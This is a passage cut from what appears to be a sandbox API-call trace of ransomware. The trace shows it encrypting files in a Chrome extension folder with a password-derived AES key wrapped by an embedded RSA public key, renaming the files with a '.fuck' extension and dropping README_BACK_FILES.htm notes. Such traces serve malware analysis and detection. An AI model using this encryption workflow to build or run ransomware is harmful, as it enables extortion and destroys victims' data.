out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.735] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.735] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.735] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.735] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.735] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.735] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.735] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.735] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.735] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.735] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.735] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.736] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.736] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.736] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.736] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.736] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.736] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.736] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.736] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.736] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.736] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.736] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.736] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.736] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.736] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.736] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.736] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.736] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.736] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.736] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.737] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.737] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x17e, lpOverlapped=0x0) returned 1 [0262.737] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x17e, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x180) returned 1 [0262.737] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x180, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x180, lpOverlapped=0x0) returned 1 [0262.737] CloseHandle (hObject=0x5d60) returned 1 [0262.737] CloseHandle (hObject=0x5d5c) returned 1 [0262.737] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json"), bFailIfExists=0) returned 1 [0262.741] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json", dwFileAttributes=0x0) returned 1 [0262.741] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json.gsg")) returned 1 [0262.743] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json.fuck")) returned 1 [0262.744] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0262.744] CryptDestroyKey (hKey=0x2e7da00) returned 1 [0262.744] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0262.744] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0262.744] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0262.744] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\readme_back_files.htm")) returned 0xffffffff [0262.744] AreFileApisANSI () returned 1 [0262.744] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x275c330, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 162 [0262.745] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0262.745] GetFileType (hFile=0x5d64) returned 0x1 [0262.746] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0262.748] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0262.748] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0262.748] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0262.748] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0262.748] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0262.748] GetLastError () returned 0x0 [0262.748] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json")) returned 0x20 [0262.749] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json", dwFileAttributes=0x80) returned 1 [0262.750] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0262.750] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0262.751] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0262.752] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7a500) returned 1 [0262.754] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0262.754] lstrlenA (lpString="nyVZwrEPeJcSGZnLzNUpNIeDzMlQm") returned 29 [0262.754] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb328, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0262.754] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7de00) returned 1 [0262.754] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----o", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0262.754] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0262.754] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e73f00) returned 1 [0262.755] CryptImportPublicKeyInfo (in: hCryptProv=0x2e73f00, dwCertEncodingType=0x1, pInfo=0x2eae1f0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eae220*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eae228*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7e100) returned 1 [0262.755] CryptEncrypt (in: hKey=0x2e7e100, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0262.755] CryptEncrypt (in: hKey=0x2e7e100, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e73a38*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e73a38*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0262.755] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e73a38*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e73a38*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0262.756] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.758] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.758] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.762] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.762] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.762] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.763] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.763] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.763] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.763] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.763] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.763] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.763] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.763] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.763] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.763] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.763] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.763] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.764] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.764] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.764] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.764] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.764] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.764] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.764] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.764] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, 